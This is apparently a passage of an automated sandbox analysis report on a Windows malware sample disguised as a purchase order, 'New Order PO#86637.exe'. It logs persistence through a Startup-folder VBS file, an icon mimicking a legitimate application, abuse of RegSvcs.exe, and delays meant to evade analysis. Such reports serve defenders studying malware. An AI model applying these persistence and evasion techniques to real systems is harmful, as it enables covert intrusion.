                      Source: Binary string: wntdll.pdbUGP source: name.exe, 00000002.00000003.2096037101.0000000004590000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2097615402.0000000004730000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.2224019871.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.2223130038.00000000049D0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: name.exe, 00000002.00000003.2096037101.0000000004590000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2097615402.0000000004730000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.2224019871.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.2223130038.00000000049D0000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
                      Source: New Order PO#86637.exeStatic PE information: real checksum: 0xa961f should be: 0x1493cf
                      Source: name.exe.0.drStatic PE information: real checksum: 0xa961f should be: 0x1493cf
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0298891E pushad ; iretd 3_2_0298891F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02988C2F pushfd ; iretd 3_2_02988C30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02988DDF push esp; iretd 3_2_02988DE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06549242 push es; ret 3_2_06549244
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_00416CB5 push ecx; ret 5_2_00416CC8
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_04648A6A pusha ; ret 5_2_04648B41
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF87E7 pushad ; iretd 6_2_04CF87EA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF878F push esi; iretd 6_2_04CF8792
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF878B push esi; iretd 6_2_04CF878E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF8787 push esi; iretd 6_2_04CF878A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF8783 push ebp; iretd 6_2_04CF8786
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF8743 push eax; iretd 6_2_04CF8752
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF875F push edx; iretd 6_2_04CF8762
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF875B push edx; iretd 6_2_04CF875E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF8757 push ecx; iretd 6_2_04CF875A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF8753 push eax; iretd 6_2_04CF8756
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF876F push ebx; iretd 6_2_04CF8772
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF876B push ebx; iretd 6_2_04CF876E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF8767 push edx; iretd 6_2_04CF876A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF8763 push edx; iretd 6_2_04CF8766
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF877F push ebp; iretd 6_2_04CF8782
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF877B push ebx; iretd 6_2_04CF877E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF8777 push ebx; iretd 6_2_04CF877A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF8773 push ebx; iretd 6_2_04CF8776
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF880F push 688704CFh; iretd 6_2_04CF8816
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeFile created: C:\Users\user\AppData\Local\directory\name.exeJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to dropped file
                      Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to behavior
                      Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (8).png
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,5_2_0047A330
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_00434418
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\AppData\Local\directory\name.exeAPI/Special instruction interceptor: Address: 421829C
                      Source: C:\Users\user\AppData\Local\directory\name.exeAPI/Special instruction interceptor: Address: 46482C4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599641Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599532Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599419Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599297Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599078Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598948Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598819Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598701Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598555Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598438Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598313Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598188Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598063Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597938Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597828Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597719Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597594Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596085Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595966Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595824Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595704Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595579Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595454Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595329Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595204Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595079Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594954Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594829Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594704Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594579Jump to behavior
